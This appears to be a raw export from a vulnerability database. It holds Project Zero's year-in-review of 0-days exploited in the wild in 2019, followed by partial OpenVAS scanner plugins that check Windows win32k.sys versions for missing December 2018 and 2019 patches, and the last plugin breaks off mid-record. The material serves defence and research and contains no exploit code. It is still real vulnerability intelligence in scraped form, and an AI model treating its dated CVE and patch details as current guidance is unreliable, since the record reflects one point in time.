In addition, we would really like to work more closely with vendors on patches and mitigations prior to the patch being released. We often have ideas of how issues can be addressed. Early collaboration and offering feedback during the patch design and implementation process is good for everyone.
Researchers and vendors alike can save time, resources, and energy by working together, rather than patch diffing a binary after release and realizing the vulnerability was not completely fixed.

Title: Déjà vu-lnerability
ID GOOGLEPROJECTZERO:A596034F451F58030932B2FC46FB6F38 Type googleprojectzero Modified 2021-02-03T00:00:00 Published 2021-02-03T00:00:00
Href: https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html
CVSS: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)

Next record: lastseen 2020-12-14T19:22:35, bulletinFamily info
CVEs: CVE-2016-5195, CVE-2018-8653, CVE-2019-0676, CVE-2019-0703, CVE-2019-0797, CVE-2019-0803, CVE-2019-0808, CVE-2019-0859, CVE-2019-0880, CVE-2019-1132, CVE-2019-1367, CVE-2019-13720, CVE-2019-1429, CVE-2019-1458, CVE-2019-2215, CVE-2019-5786, CVE-2019-7286, CVE-2019-7287, CVE-2020-0674
Description

Posted by Maddie Stone, Project Zero

In May 2019, Project Zero released our [tracking spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) for 0-days used “in the wild” and we started a more focused effort on analyzing and learning from these exploits. This is another way Project Zero is trying to make zero-day hard. This blog post synthesizes many of our efforts and what we’ve seen over the last year. We provide a review of what we can learn from 0-day exploits detected as used in the wild in 2019. In conjunction with this blog post, we are also publishing another [blog post](<https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html>) today about our root cause analysis work that informed the conclusions in this Year in Review. We are also releasing [8 root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>) that we have done for in-the-wild 0-days from 2019.
When I had the idea for this “Year in Review” blog post, I immediately started brainstorming the different ways we could slice the data and the different conclusions it may show. I thought that maybe there’d be interesting conclusions around why use-after-free is one of the most exploited bug classes or how a given exploitation method was used in Y% of 0-days or… but despite my attempts to find these interesting technical conclusions, over and over I kept coming back to the problem of the detection of 0-days. Through the variety of areas I explored, the data and analysis continued to highlight a single conclusion: As a community, our ability to detect 0-days being used in the wild is severely lacking, to the point that we can’t draw significant conclusions due to the lack of (and biases in) the data we have collected.

The rest of the blog post will detail the analyses I did on 0-days exploited in 2019 that informed this conclusion. As a team, Project Zero will continue to research new detection methods for 0-days. We hope this post will convince you to work with us on this effort.

# The Basics

In 2019, 20 0-days were detected and disclosed as exploited in the wild. This number, and our tracking, is scoped to targets and areas that Project Zero actively researches. You can read more about our scoping [here](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>). This seems approximately average for the years 2014-2017, with an uncharacteristically low number of 0-days detected in 2018. Please note that Project Zero only began tracking the data in July 2014 when the team was founded, and so the numbers for 2014 have been doubled as an approximation.
[Figure (image2.png)](<https://1.bp.blogspot.com/-KjU24qokuEA/Xx7hJ08C_1I/AAAAAAAAQsM/OKDRS46ehfI1hNudHNV4_lNoUHxTubtfgCNcBGAsYHQ/s1600/image2.png>)

The largely steady number of detected 0-days might suggest that defender detection techniques are progressing at the same speed as attacker techniques. That could be true. Or it could not be. The data in our spreadsheet are only the 0-day exploits that were detected, not the 0-day exploits that were used. As long as we still don’t know the true detection rate of all 0-day exploits, it’s very difficult to make any conclusions about whether the number of 0-day exploits deployed in the wild is increasing or decreasing. For example, if all defenders stopped detection efforts, that could make it appear that there are no 0-days being exploited, but we’d clearly know that to be false.

All of the 0-day exploits detected in 2019 are detailed in the Project Zero [tracking spreadsheet here](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=8521108>).

## 0-days by Vendor

One of the common ways to analyze vulnerabilities and security issues is to look at who is affected. The breakdown of the 0-days exploited in 2019 by vendor is below. While the data shows us that almost all of the big platform vendors have at least a couple of 0-days detected against their products, there is a large disparity. Based on the data, it appears that Microsoft products are targeted about 5x more than Apple and Google products. Yet Apple and Google, with their iOS and Android products, make up a huge majority of devices in the world.

While Microsoft Windows has always been a prime target for actors exploiting 0-days, I think it’s more likely that we see more Microsoft 0-days due to detection bias.
Because Microsoft has been a target since before some of the other platforms were even invented, there have been many more years of development of 0-day detection solutions for Microsoft products. Microsoft’s ecosystem also allows for third parties, in addition to Microsoft itself, to deploy detection solutions for 0-days. More people looking for 0-days using varied detection methodologies suggests more 0-days will be found.

[Figure (image1.png)](<https://1.bp.blogspot.com/-GZX-X9f4DIA/Xx7hqTX713I/AAAAAAAAQsY/rFiPVHd9cloMQtfR4bPTL9SGRyCNV2N5gCNcBGAsYHQ/s1600/image1.png>)

# Microsoft Deep-Dive

For 2019, there were 11 0-day exploits detected in-the-wild in Microsoft products, more than 50% of all 0-days detected. Therefore, I think it’s worthwhile to dive into the Microsoft bugs to see what we can learn, since it’s the only platform we have a decent sample size for.

Of the 11 Microsoft 0-days, only 4 were detected as exploiting the latest software release of Windows. All others targeted earlier releases of Windows, such as Windows 7, which was originally released in 2009. Of the 4 0-days that exploited the latest versions of Windows, 3 targeted Internet Explorer, which, while it’s not the default browser for Windows 10, is still included in the operating system for backwards compatibility. This means that 10/11 of the Microsoft vulnerabilities targeted legacy software.

Out of the 11 Microsoft 0-days, 6 targeted the Win32k component of the Windows operating system. Win32k is the kernel component responsible for the windows subsystem, and historically it has been a prime target for exploitation. However, with Windows 10, Microsoft dedicated resources to locking down the attack surface of win32k. Based on the data of detected 0-days, none of the 6 detected win32k exploits were detected as exploiting the latest Windows 10 software release.
And 2 of the 0-days (CVE-2019-0676 and CVE-2019-1132) only affected Windows 7.

Even just within the Microsoft 0-days, there is likely detection bias. Is legacy software really the predominant target for 0-days in Microsoft Windows, or are we just better at detecting them since this software and these exploit techniques have been around the longest?

| CVE | Windows 7 SP1 | Windows 8.1 | Windows 10 | Win 10 1607 | Win 10 1703 | Win 10 1803 | Win 10 1809 | Win 10 1903 | Exploitation of Latest SW Release? | Component |
|---|---|---|---|---|---|---|---|---|---|---|
| CVE-2019-0676 | X | X | X | X | X | X | X |  | Yes (1809) | IE |
| CVE-2019-0808 | X |  |  |  |  |  |  |  | N/A (1809) | win32k |
| CVE-2019-0797 |  | X | X | X | X | X | X |  | Exploitation Unlikely (1809) | win32k |
| CVE-2019-0703 | X | X | X | X | X | X | X |  | Yes (1809) | Windows SMB |
| CVE-2019-0803 | X | X | X | X | X | X | X |  | Exp More Likely (1809) | win32k |
| CVE-2019-0859 | X | X | X | X | X | X | X |  | Exp More Likely (1809) | win32k |
| CVE-2019-0880 | X | X | X | X | X | X | X | X | Exp More Likely (1903) | splwow64 |
| CVE-2019-1132 | X |  |  |  |  |  |  |  | N/A (1903) | win32k |
| CVE-2019-1367 | X | X | X | X | X | X | X | X | Yes (1903) | IE |
| CVE-2019-1429 | X |  | X | X | X | X | X | X | Yes (1903) | IE |
| CVE-2019-1458 | X | X | X | X |  |  |  |  | N/A (1909) | win32k |

## Internet Explorer JScript 0-days CVE-2019-1367 and CVE-2019-1429

While this blog post’s goal is not to detail each 0-day used in 2019, it’d be remiss not to discuss the Internet Explorer JScript 0-days. CVE-2019-1367 and CVE-2019-1429 (and CVE-2018-8653 from Dec 2018 and CVE-2020-0674 from Feb 2020) are all variants of each other, with all 4 being exploited in the wild by the same actor [according to Google’s Threat Analysis Group (TAG)](<https://www.blog.google/threat-analysis-group/identifying-vulnerabilities-and-protecting-you-phishing/>).

Our [root cause analysis](<https://googleprojectzero.blogspot.com/p/rca-cve-2019-1367.html>) provides more details on these bugs, but we’ll summarize the points here. The bug class is a JScript variable not being tracked by the garbage collector. Multiple instances of this bug class were discovered in Jan 2018 by Ivan Fratric of Project Zero. In December 2018, Google's TAG discovered this bug class being used in the wild (CVE-2018-8653). Then in September 2019, another exploit using this bug class was found. This issue was “fixed” as CVE-2019-1367, but it turns out the patch didn’t actually fix the issue and the attackers were able to continue exploiting the original bug. At the same time, a variant of the original bug was also found by Ivan Fratric ([P0 1947](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1947>)). Both the variant and the original bug were fixed as CVE-2019-1429. Then in January 2020, TAG found another exploit sample, because Microsoft’s patch was again incomplete. This issue was patched as CVE-2020-0674.
A more thorough discussion on variant analysis and complete patches is due, but at this time we’ll simply note: the attackers who used the 0-day exploit had 4 separate chances to continue attacking users after the bug class and then the particular bugs were known. If we as an industry want to make 0-day harder, we can’t give attackers four chances at the same bug.

# Memory Corruption

63% of 2019’s exploited 0-day vulnerabilities fall under memory corruption, with half of those memory corruption bugs being use-after-free vulnerabilities. Memory corruption and use-after-frees being a common target is nothing new. “[Smashing the Stack for Fun and Profit](<http://phrack.org/issues/49/14.html>)”, the seminal work describing stack-based memory corruption, was published back in 1996. But it’s interesting to note that almost two-thirds of all detected 0-days are still exploiting memory corruption bugs when there’s been so much interesting security research into other classes of vulnerabilities, such as logic bugs and compiler bugs. Again, two-thirds of detected 0-days are memory corruption bugs. While I don’t know for certain that that proportion is false, we can't know either way, because it's easier to detect memory corruption than other types of vulnerabilities. Due to the prevalence of memory corruption bugs and the fact that they tend to be less reliable than logic bugs, this could be another detection bias. Types of memory corruption bugs tend to be very similar within platforms and don’t really change over time: a use-after-free from a decade ago largely looks like a use-after-free bug today, and so I think we may just be better at detecting these exploits.
Logic and design bugs, on the other hand, rarely look the same because by their nature they’re taking advantage of a specific flaw in the design of that specific component, thus making them more difficult to detect than standard memory corruption vulns.

Even if our data is biased to over-represent memory corruption vulnerabilities, memory corruption vulnerabilities are still being regularly exploited against users, and thus we need to continue focusing on systemic and structural fixes such as memory tagging and memory safe languages.

# More Thoughts on Detection

As we’ve discussed up to this point, the same questions posed in the team's [original blog post](<https://googleprojectzero.blogspot.com/p/0day.html>) still hold true: “What is the detection rate of 0-day exploits?” and “How many 0-day exploits are used without being detected?”.

We, as the security industry, are only able to review and analyze 0-days that were detected, not all 0-days that were used. While some might see this data and say that Microsoft Windows is exploited with 0-days 11x more often than Android, those claims cannot be made in good faith. Instead, I think the security community simply detects 0-days in Microsoft Windows at a much higher rate than on any other platform. If we look back historically, the first anti-viruses and detections were built for Microsoft Windows rather than any other platform. As time has continued, the detection methods for Windows have continued to evolve. Microsoft builds tools and techniques for detecting 0-days, as do third party security companies. We don’t see the same plethora of detection tools on other platforms, especially the mobile platforms, which means there’s less likelihood of detecting 0-days on those platforms too.
An area for big growth is detecting 0-days on platforms other than Microsoft Windows, and what level of access a vendor provides for detection.

## Who is doing the detecting?

Another interesting side of detection is that a single security researcher, Clément Lecigne of Google's TAG, is credited with 7 of the 21 detected 0-days in 2019 across 4 platforms: Apple iOS (CVE-2019-7286, CVE-2019-7287), Google Chrome (CVE-2019-5786), Microsoft Internet Explorer (CVE-2019-0676, CVE-2019-1367, CVE-2019-1429), and Microsoft Windows (CVE-2019-0808). Put another way, we could have detected a third fewer of the 0-days actually used in the wild if it wasn’t for Clément and team. When we add in the entity with the second most, Kaspersky Lab, with 4 of the 0-days (CVE-2019-0797, CVE-2019-0859, CVE-2019-13720, CVE-2019-1458), that means that two entities are responsible for more than 50% of the 0-days detected in 2019. If two entities out of the entirety of the global security community are responsible for detecting more than half of the 0-days in a year, that’s a worrying sign for how we’re using our resources. The security community has a lot of growth to do in this area to have any confidence that we are detecting the majority of 0-day exploits that are used in the wild.

Out of the 20 0-days, only one (CVE-2019-0703) included discovery credit to the vendor that was targeted, and even that one was also credited to an external researcher. To me, this is surprising because I’d expect that the vendor of a platform would be best positioned to detect 0-days with their access to the most telemetry data, logs, ability to build detections into the platform, “tips” about exploits, etc. This begs the question: are the vendor security teams that have the most access not putting resources towards detecting 0-days, or are they finding them and just not disclosing them when they are found internally?
Either way, this is less than ideal. When you consider the locked down mobile platforms, this is especially worrisome, since it’s so difficult for external researchers to get into those platforms and detect exploitation.

## “Clandestine” 0-day reporting

Anecdotally, we know that sometimes vulnerabilities are reported surreptitiously, meaning that they are reported as just another bug, rather than as a vulnerability that is being actively exploited. This hurts security because users and their enterprises may take different actions, based on their own unique threat models, if they knew a vulnerability was actively exploited. Vendors and third party security professionals could also create better detections, invest in related research, prioritize variant analysis, or take other actions that could directly make it more costly for the attacker to exploit additional vulnerabilities and users if they knew that attackers were already exploiting the bug. If all would transparently disclose when a vulnerability is exploited, our detection numbers would likely go up as well, and we would have better information about the current preferences and behaviors of attackers.

# 0-day Detection on Mobile Platforms

As mentioned above, an especially interesting and needed area for development is mobile platforms, iOS and Android. In 2019, there were only 3 detected 0-days for all of mobile: 2 for iOS (CVE-2019-7286 and CVE-2019-7287) and 1 for Android (CVE-2019-2215). However, there are billions of mobile phone users, and Android and iOS exploits sell for double or more compared to an equivalent desktop exploit according to [Zerodium](<https://zerodium.com/program.html>). We know that these exploits are being developed and used, we’re just not finding them.
The mobile platforms, iOS and Android, are likely two of the toughest platforms for third party security solutions to deploy upon due to the “walled garden” of iOS and the application sandboxes of both platforms. The same features that are critical for user security also make it difficult for third parties to deploy on-device detection solutions. Since it’s so difficult for non-vendors to deploy solutions, we as users and the security community rely on the vendors to be active and transparent in hunting 0-days targeting these platforms. Therefore a crucial question becomes: how do we as fellow security professionals incentivize the vendors to prioritize this?

Another interesting artifact that appeared when doing the analysis is that CVE-2019-2215 is the first detected 0-day targeting Android since we started tracking 0-days. Up until that point, the closest was CVE-2016-5195, which targeted Linux. Yet, the only Android 0-day found in 2019 (AND since 2014) is CVE-2019-2215, which was detected through documents rather than by finding a zero-day exploit sample. Therefore, no 0-day exploit samples were detected (or, at least, publicly disclosed) in all of 2019, 2018, 2017, 2016, 2015, and half of 2014. Based on knowledge of the offensive security industry, we know that that doesn’t mean none were used. Instead it means we aren’t detecting well enough, and 0-days are being exploited without public knowledge. Therefore, those 0-days go unpatched and users and the security community are unable to take additional defensive actions. Researching new methodologies for detecting 0-days targeting mobile platforms, iOS and Android, is a focus for Project Zero in 2020.

# Detection on Other Platforms

It’s interesting to note that other popular platforms had no 0-days detected over the same period, like Linux, Safari, or macOS.
While no 0-days have been publicly detected on these platforms, we can have confidence that they are still targets of interest, based on the number of users they have, job requisitions for offensive positions seeking these skills, and even conversations with offensive security researchers. If Trend Micro’s OfficeScan is worth targeting, then so are other, much more prevalent products. If that is the case, then again it leads us back to detection. We should also keep in mind that some platforms may not need 0-days for successful exploitation. For example, this [blogpost](<https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html>) details how iOS exploit chains used publicly known n-days to exploit WebKit. But without more complete data, we cannot make confident determinations of how much 0-day exploitation is occurring per platform.\n\n# Conclusion\n\nThis is our first Year in Review of 0-days exploited in the wild. As this program evolves, so will what we publish, based on feedback from you and as our own knowledge and experience continue to grow. We started this effort expecting to find a multitude of different conclusions, primarily “technical” ones, but once the analysis began, it became clear that everything came back to a single conclusion: we have a big gap in detecting 0-day exploits. Project Zero is committed to continuing to research new detection methodologies for 0-day exploits and sharing that knowledge with the world.\n\nAlong with publishing this Year in Review today, we are also publishing the [root cause analyses](<https://googleprojectzero.blogspot.com/p/rca.html>) that we completed, which were used to draw our conclusions. Please check out the [blog post](<https://googleprojectzero.blogspot.com/2020/07/root-cause-analyses-for-0-day-in-wild.html>) if you are interested in more details about the different 0-days exploited in the wild in 2019. 
\n\n \n\n", "modified": "2020-07-29T00:00:00", "published": "2020-07-29T00:00:00", "id": "GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126", "href": "https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html", "type": "googleprojectzero", "title": "\nDetection Deficit: A Year in Review of 0-days Used In-The-Wild in 2019\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-01-08T13:28:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8596", "CVE-2018-8641", "CVE-2018-8619", "CVE-2018-8622", "CVE-2018-8611", "CVE-2018-8595", "CVE-2018-8639", "CVE-2018-8626", "CVE-2018-8643", "CVE-2018-8514", "CVE-2018-8631", "CVE-2018-8625", "CVE-2018-8477"], "description": "This host is missing a critical security\n update according to Microsoft KB4471320", "modified": "2019-12-20T00:00:00", "published": "2018-12-12T00:00:00", "id": "OPENVAS:1361412562310814616", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814616", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4471320)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4471320)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814616\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2018-8477\", \"CVE-2018-8514\", \"CVE-2018-8611\", \"CVE-2018-8619\",\n \"CVE-2018-8622\", \"CVE-2018-8625\", \"CVE-2018-8626\", \"CVE-2018-8631\",\n \"CVE-2018-8639\", \"CVE-2018-8641\", \"CVE-2018-8643\", \"CVE-2018-8595\",\n \"CVE-2018-8596\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-12-12 13:11:27 +0530 (Wed, 12 Dec 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4471320)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4471320\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows kernel fails to properly handle objects in memory.\n\n - Internet Explorer VBScript execution policy does not properly\n restrict VBScript under specific conditions.\n\n - Scripting engine improperly handles objects in memory in Internet\n Explorer.\n\n - Windows kernel-mode driver fails to properly handle objects in memory.\n\n - Internet Explorer improperly accesses objects in memory\n\n - Windows GDI component improperly discloses the contents of its\n memory.\n\n - Windows Domain Name System (DNS) servers when they fail to properly 
handle\n requests.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - VBScript engine improperly handles objects in memory.\n\n - Remote Procedure Call runtime improperly initializes objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, elevate privileges and obtain information to further\n compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4471320\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.3.9600.19208\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\win32k.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 6.3.9600.19208\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:12", "bulletinFamily": "scanner", 
"cvelist": ["CVE-2018-8621", "CVE-2018-8596", "CVE-2018-8641", "CVE-2018-8619", "CVE-2018-8622", "CVE-2018-8611", "CVE-2018-8595", "CVE-2018-8639", "CVE-2018-8643", "CVE-2018-8514", "CVE-2018-8631", "CVE-2018-8625", "CVE-2018-8477"], "description": "This host is missing a critical security\n update according to Microsoft KB4471318", "modified": "2020-06-04T00:00:00", "published": "2018-12-12T00:00:00", "id": "OPENVAS:1361412562310814619", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814619", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4471318)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4471318)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814619\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-8477\", \"CVE-2018-8514\", \"CVE-2018-8611\", \"CVE-2018-8619\",\n \"CVE-2018-8621\", \"CVE-2018-8622\", \"CVE-2018-8625\", \"CVE-2018-8631\",\n \"CVE-2018-8639\", \"CVE-2018-8641\", \"CVE-2018-8643\", \"CVE-2018-8595\",\n \"CVE-2018-8596\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-12 13:11:27 +0530 (Wed, 12 Dec 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4471318)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4471318\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Windows kernel improperly handles objects in memory.\n\n - Internet Explorer VBScript execution policy does not properly\n restrict VBScript under specific conditions.\n\n - Scripting engine improperly handles objects in memory in Internet\n Explorer.\n\n - Windows kernel-mode driver fails to properly handle objects in memory.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows GDI component improperly discloses the contents of its\n memory.\n\n - Windows Domain Name System (DNS) servers when they fail to properly handle\n 
requests.\n\n - Windows Win32k component fails to properly handle objects in\n memory.\n\n - VBScript engine improperly handles objects in memory.\n\n - Remote Procedure Call runtime improperly initializes objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to run arbitrary code, elevate privileges and obtain information to further\n compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\n\n - Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4471318\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008r2:2, win7:2, win7x64:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.24313\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Win32k.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.24313\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2020-07-21T20:40:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "description": "This host is missing a critical security\n update according to Microsoft KB4530702", "modified": "2020-07-17T00:00:00", "published": "2019-12-11T00:00:00", "id": "OPENVAS:1361412562310815735", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815735", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4530702)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815735\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-1453\", \"CVE-2019-1458\", \"CVE-2019-1465\", \"CVE-2019-1466\",\n \"CVE-2019-1467\", \"CVE-2019-1468\", \"CVE-2019-1469\", \"CVE-2019-1470\",\n \"CVE-2019-1474\", \"CVE-2019-1484\", \"CVE-2019-1485\", \"CVE-2019-1488\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-12-11 11:44:25 +0530 (Wed, 11 Dec 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4530702)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4530702\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on\n the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to:\n\n - Win32k component fails to properly handle objects in memory.\n\n - win32k component improperly provides kernel information.\n\n - Windows kernel improperly handles objects in memory.\n\n - Microsoft Defender improperly handles specific buffers.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to elevate privileges, execute arbitrary code, read unauthorized\n information, bypass security restrictions and cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - 
